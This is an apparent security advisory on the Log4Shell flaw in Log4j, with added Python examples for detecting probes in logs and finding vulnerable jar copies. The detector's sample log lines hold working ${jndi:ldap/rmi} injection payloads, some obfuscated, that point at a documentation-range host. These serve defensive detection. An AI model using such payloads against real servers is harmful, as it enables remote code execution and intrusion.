A severe security vulnerability in a widely used piece of software is posing a threat to organisations across the globe.
Cyber security experts are urging anyone who uses the Log4j Java open source logging library to update their systems to the latest version or apply a mitigation immediately.
The “Log4Shell” vulnerability (tracked as CVE-2021-44228 in the Common Vulnerabilities and Exposures catalogue) carries the maximum CVSS severity score of 10.0 because an unauthenticated attacker can use it to run code of their choosing on a vulnerable server over the internet.
Attackers are already actively scanning the internet for vulnerable systems and exploiting them as soon as they are found, and authorities are warning that ransomware attacks using this method are likely.
The popular game Minecraft was the first widely reported victim: attackers simply typed malicious text into the in-game chat window. Because the server logs chat messages through Log4j, the library treated the text as a lookup expression, fetched attacker-supplied code from a remote server and ran it.
Anyone using versions 2.0-beta9 to 2.14.1 of Log4j is affected. The exploitation also impacts default configurations of Apache frameworks such as Apache Struts2, Apache Solr, Apache Druid and Apache Flink, among others, if they have not been updated to a fixed version.
We have seen the type of damage that can be wrought through flaws in widely used open source software from Apache projects before: the devastating 2017 breach of credit bureau Equifax, which saw the personal data of 148 million Americans and 15 million Britons compromised, was perpetrated through a flaw in Apache Struts. Businesses are urged to update to the latest version of Log4j wherever it is used as soon as possible.
What is CVE-2021-44228 aka Log4Shell?
Several days ago, security outlets and media started reporting on the discovery of a critical vulnerability in the Apache Log4j library, which is used by millions of organisations across the globe, both in their own internal software and the third-party products they use to run their operations.
CVE-2021-44228 (Log4j/Log4Shell) can be easily exploited to take control of vulnerable systems remotely, and we are aware that attackers are actively scanning the internet for affected systems. The United States Cybersecurity and Infrastructure Security Agency (CISA) issued an alert about the vulnerability on December 10th.
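The chat message that compromised Minecraft servers and the internet-wide scanning described above both leave the same trace in logs: a ${jndi:...} lookup string in user-controlled input. The following detector is an added example, not code from Telstra or the Apache project, and goes beyond the text by also unwrapping the ${lower:}, ${upper:} and ${x:-y} obfuscation wrappers and URL-encoded forms that scanners use to slip past naive string matches. The sample log lines are constructed for the example; the 203.0.113.0/24 addresses are documentation addresses, not real attacker infrastructure.

```python
import re
from urllib.parse import unquote
from typing import List

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
_INNERMOST = re.compile(r"\$\{([^{}]*)\}")


def _resolve(body: str) -> str:
    """Reduce one obfuscation-only lookup body to the text Log4j would substitute."""
    if ":-" in body:                      # default-value operator: ${anything:-X} -> X
        return body.split(":-", 1)[1]
    kind, sep, value = body.partition(":")
    if not sep:
        return body                       # ${name} with no lookup prefix: leave the name
    kind = kind.lower()
    if kind == "lower":
        return value.lower()
    if kind == "upper":
        return value.upper()
    return value                          # other lookups (env, sys, date...): keep argument text


def normalize(line: str, max_rounds: int = 64) -> str:
    """Strip layered ${lower:}, ${upper:} and ${x:-y} wrappers until a jndi: lookup
    surfaces or no resolvable lookup remains. URL-encoded lines are decoded first."""
    text = unquote(line)
    for _ in range(max_rounds):
        m = _INNERMOST.search(text)
        if m is None:
            break
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            break                         # the real payload is exposed; keep it for matching
        text = text[:m.start()] + _resolve(body) + text[m.end():]
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a ${jndi:...} lookup, plainly or obfuscated."""
    return "${jndi:" in normalize(line).lower()


def find_probes(lines: List[str]) -> List[str]:
    """Return the normalized form of every line that carries a JNDI lookup."""
    return [normalize(l) for l in lines if is_log4shell_probe(l)]


# Constructed sample web-server log lines for this example (not real traffic).
SAMPLE_LOG = [
    'GET /index.html HTTP/1.1 200 "Mozilla/5.0"',
    'GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1 200',
    'GET / HTTP/1.1 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.5/a}"',
    'GET / HTTP/1.1 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5/b}"',
    'GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fc%7D HTTP/1.1 404',
    'POST /login HTTP/1.1 200 "price is ${amount} dollars"',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print("PROBE:", hit)
```

The detector reports the normalized payload rather than the raw line, so the LDAP or RMI host it points at can be blocked at the egress firewall; a hit means someone probed the system, not necessarily that it was vulnerable, so each hit still needs the version check against the Log4j jars the application loads.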
What systems are affected?
Any system or service that uses the Apache Log4j 2 Java logging library at a version between 2.0-beta9 and 2.14.1 inclusive, whether it is used directly in in-house software or bundled inside a third-party product.
How can I update or mitigate against the vulnerability?
The Apache Software Foundation has issued Log4j version 2.16.0, which is not vulnerable to Log4Shell by default, and upgrading is the recommended fix. Where an immediate upgrade is not possible, the mitigation Apache published for 2.x is to delete the JndiLookup class from the log4j-core jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) and restart the application. Either way, the check must cover copies of Log4j bundled inside application archives and third-party products, not just the jars installed by name.
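Answering both questions above, which systems are affected and whether the mitigation has been applied, comes down to finding every copy of log4j-core on a host, reading its version and checking whether JndiLookup.class is still present. The scanner below is an added example, not a Telstra or Apache tool. It assumes that a log4j-core jar carries its version in the Maven pom.properties or in the manifest's Implementation-Version, and it descends into nested .jar/.war/.ear entries because fat jars and web applications bundle the library where a filename search never looks. The sample archive it builds is a constructed stand-in with empty class entries, not a real Log4j build.

```python
import io
import os
import re
import zipfile
from typing import Iterator, List, Optional, Tuple

# Class whose presence makes the JNDI lookup reachable; Apache's 2.x mitigation deletes it.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_PREFIX = "org/apache/logging/log4j/core/"          # identifies log4j-core, shaded or not
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2}      # pre-release qualifiers sort before a release


def version_key(version: str) -> tuple:
    """Order Log4j versions so that 2.0-beta8 < 2.0-beta9 < 2.0 < 2.14.1 < 2.16.0."""
    base, _, qualifier = version.partition("-")
    parts = [int(p) for p in re.findall(r"\d+", base)][:3]
    parts += [0] * (3 - len(parts))
    m = re.match(r"([A-Za-z]+)(\d*)", qualifier)
    if m and m.group(1).lower() in _QUALIFIER_RANK:
        return tuple(parts) + (_QUALIFIER_RANK[m.group(1).lower()], int(m.group(2) or 0))
    return tuple(parts) + (3, 0)


FIRST_AFFECTED = version_key("2.0-beta9")
LAST_AFFECTED = version_key("2.14.1")
FIXED = version_key("2.16.0")


def assess(version: Optional[str], has_jndi_lookup: bool) -> str:
    """Verdict for one log4j-core copy from its version and whether JndiLookup.class is present."""
    if version is None:
        return "UNKNOWN-VERSION" if has_jndi_lookup else "UNKNOWN-VERSION (JndiLookup absent)"
    key = version_key(version)
    if key < FIRST_AFFECTED:
        return "OUT-OF-RANGE"          # 1.x and earlier 2.0 betas: outside the CVE-2021-44228 range
    if key >= FIXED:
        return "OK"
    if key > LAST_AFFECTED:
        return "UPGRADE"               # 2.15.x: below the 2.16.0 release that is safe by default
    return "VULNERABLE" if has_jndi_lookup else "MITIGATED"


def _log4j_version(zf: zipfile.ZipFile, names: set) -> Optional[str]:
    """Version from Maven pom.properties, falling back to a manifest that names Log4j."""
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    if "META-INF/MANIFEST.MF" in names:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        if re.search(r"^Implementation-Title:.*Log4j", manifest, re.M | re.I):
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if m:
                return m.group(1)
    return None


def scan_archive(data: bytes, label: str) -> Iterator[Tuple[str, Optional[str], str]]:
    """Yield (location, version, verdict) for every log4j-core inside an archive,
    descending into nested archives (fat jars, WEB-INF/lib, ear modules)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = set(zf.namelist())
        if any(n.startswith(CORE_PREFIX) for n in names):
            version = _log4j_version(zf, names)
            yield (label, version, assess(version, JNDI_LOOKUP_CLASS in names))
        for n in sorted(names):
            if n.lower().endswith(ARCHIVE_SUFFIXES):
                yield from scan_archive(zf.read(n), f"{label}!{n}")


def scan_tree(root: str) -> List[Tuple[str, Optional[str], str]]:
    """Walk a directory tree and scan every archive found in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    findings.extend(scan_archive(fh.read(), path))
    return findings


def build_sample_archive(version: str, keep_jndi_lookup: bool, nested: bool = False) -> bytes:
    """Constructed stand-in for a log4j-core jar (empty class entries), optionally inside a .war."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(CORE_PREFIX + "Logger.class", b"")
        if keep_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    if not nested:
        return buf.getvalue()
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as war:
        war.writestr("WEB-INF/lib/log4j-core.jar", buf.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_archive("2.14.1", True, nested=True), "app.war"):
        print(finding)
```

Run scan_tree against the application and container image roots on each host; a VULNERABLE verdict on a nested location such as app.war!WEB-INF/lib/log4j-core.jar means the fix has to be applied by rebuilding that archive, since deleting the class from a jar on disk does nothing for a copy packed inside a war.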
Source: Telstra Exchange